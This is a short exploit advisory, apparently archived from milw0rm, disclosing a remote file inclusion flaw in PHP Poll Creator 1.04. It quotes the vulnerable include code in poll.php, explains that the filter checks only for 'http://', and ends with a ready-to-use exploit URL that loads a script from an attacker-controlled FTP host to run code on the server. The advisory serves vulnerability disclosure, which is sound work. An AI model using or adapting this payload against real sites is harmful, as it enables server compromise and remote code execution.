phpPC 1.04 Multiples Remote File Inclusion Script : PHP Poll Creator Version : 1.04 Vendor URL : http://www.phppc.de Impact : Remote File Inclusion Discovered by : iss4m Contact : iss4m.1@gmail.com Vulnerable code in poll.php -------------------------------- = 1 OR substr_count($relativer_pfad,"../") >= 1) $relativer_pfad = ""; if ($is_phppc_included != 1) { $file = "lib/functions.inc.php"; include $relativer_pfad.$file; } include ($relativer_pfad . "layout_top_sm.inc.php"); the script check only if $relativer_pfad contain "http://" but we can include remote file using ftp:// Exploit : ********** http://localhost/phppc/poll_sm.php?is_phppc_included=1&relativer_pfad=ftp://user:pass@ftp.attacker.ltd/script.txt ? # milw0rm.com [2006-11-21]